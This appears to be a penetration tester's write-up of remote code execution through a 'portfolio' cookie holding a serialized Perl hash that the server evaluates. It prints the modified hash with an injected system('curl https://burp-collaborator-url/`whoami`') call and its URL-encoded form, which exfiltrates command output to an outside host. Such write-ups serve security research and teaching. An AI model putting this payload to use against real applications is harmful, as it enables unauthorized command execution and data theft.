Remote Code Execution via Cookie Manipulation
Remote Code Execution (RCE) is a common vulnerability, often stemming from file upload functionalities where users upload PHP files that get executed on the server. While the general concept of RCE and its potential risks are widely covered in many resources, I won’t be revisiting those details here. Instead, I’ll be focusing on a unique method I discovered while working on one of my recent projects.
The developer uses cookies to store sensitive data, such as session tokens, which are sent with each request for authorization and authentication. The developer also stores other frequently used information in the cookie, which should be discarded once the session ends. There are several recommendations for using and configuring cookies, such as enabling the HTTPOnly and Secure flags for sensitive cookies.
While browsing the webapp and inspecting the cookies, I discovered an interesting parameter named “portfolio” containing a URL-encoded value.
I decoded the value and discovered it was a PHP/Perl array code snippet.
$VAR1 = {
'deriv_by1' => '-',
'strat' => [
'curLoanBal'
],
'non_mfdirected_loans' => 'checked',
'mfdirected_loans' => 'checked',
'df1' => 1,
'isPercentOf' => undef,
'includeDefeasedLoans' => 'checked',
'weightingMethod' => 2,
'deal_strat' => [
'underwriter'
],
'weightedAverages' => undef,
'detailsort' => undef,
'detailColumns' => [
1,
4
],
'derivedLoanStatus_filter' => 'all troubled loans',
'deriv_across1' => 'propTypeCode',
'deriv_strat' => [
'curLoanBal'
],
'filterCommentaryStatus' => 'all'
};At a certain point in the code, I invoked the default system function to execute system commands on the server.
$VAR1 = {
'deriv_by1' => '-',
'strat' => [
system('curl https://burp-collaborator-url/`whoami`')
],
'non_mfdirected_loans' => 'checked',
'mfdirected_loans' => 'checked',
'df1' => 1,
'isPercentOf' => undef,
'includeDefeasedLoans' => 'checked',
'weightingMethod' => 2,
'deal_strat' => [
'underwriter'
],
'weightedAverages' => undef,
'detailsort' => undef,
'detailColumns' => [
1,
4
],
'derivedLoanStatus_filter' => 'all troubled loans',
'deriv_across1' => 'propTypeCode',
'deriv_strat' => [
'curLoanBal'
],
'filterCommentaryStatus' => 'all'
};I then re-encoded it using a URL encoder.
%24VAR1%20%3D%20%7B%0A%20%20%27deriv_by1%27%20%3D%3E%20%27-%27%2C%0A%20%20%27strat%27%20%3D%3E%20%5B%0A%20%20%20%20system%28%27curl%20https%3A%2F%2Fburp-collaborator-url%2F%60whoami%60%27%29%0A%20%20%5D%2C%0A%20%20%27non_mfdirected_loans%27%20%3D%3E%20%27checked%27%2C%0A%20%20%27mfdirected_loans%27%20%3D%3E%20%27checked%27%2C%0A%20%20%27df1%27%20%3D%3E%201%2C%0A%20%20%27isPercentOf%27%20%3D%3E%20undef%2C%0A%20%20%27includeDefeasedLoans%27%20%3D%3E%20%27checked%27%2C%0A%20%20%27weightingMethod%27%20%3D%3E%202%2C%0A%20%20%27deal_strat%27%20%3D%3E%20%5B%0A%20%20%20%20%27underwriter%27%0A%20%20%5D%2C%0A%20%20%27weightedAverages%27%20%3D%3E%20undef%2C%0A%20%20%27detailsort%27%20%3D%3E%20undef%2C%0A%20%20%27detailColumns%27%20%3D%3E%20%5B%0A%20%20%20%201%2C%0A%20%20%20%204%0A%20%20%5D%2C%0A%20%20%27derivedLoanStatus_filter%27%20%3D%3E%20%27all%20troubled%20loans%27%2C%0A%20%20%27deriv_across1%27%20%3D%3E%20%27propTypeCode%27%2C%0A%20%20%27deriv_strat%27%20%3D%3E%20%5B%0A%20%20%20%20%27curLoanBal%27%0A%20%20%5D%2C%0A%20%20%27filterCommentaryStatus%27%20%3D%3E%20%27all%27%0A%7D%3BI used the re-encoded ‘portfolio’ value and forwarded the intercepted request in Burp.
I encountered a 500 error in the response, but checking the collaborator brought a sense of satisfaction.
By manipulating the cookie, I successfully executed system commands. To confirm with certainty, I tested additional commands, such as retrieving the hostname, local IPs, and a few others.
This was an incredible discovery that taught me the importance of thinking outside the box and exploring every possible area. Bugs aren’t always found along the usual paths; you need to innovate and experiment. Even if there’s only a 0.1% chance of success, it’s worth pursuing.